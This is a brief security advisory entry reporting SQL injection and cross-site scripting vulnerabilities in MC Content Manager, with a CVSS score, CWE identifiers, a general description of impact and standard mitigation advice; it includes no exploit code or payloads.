vendor: MC Content Manager
by:
CVSS: 7.5 (HIGH)
SQL Injection and Cross-Site Scripting
CWE: 89, 79
Product Name: MC Content Manager
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Platforms Tested:
SQL Injection and Cross-Site Scripting Vulnerabilities in MC Content Manager
MC Content Manager is prone to an SQL-injection vulnerability and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input. Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Mitigation:
To mitigate these vulnerabilities, it is recommended to sanitize user-supplied input before using it in SQL queries or outputting it in HTML pages. Additionally, implementing proper input validation and using parameterized queries can help prevent SQL injection attacks. Regular security updates and patches should be applied to MC Content Manager to address any existing vulnerabilities.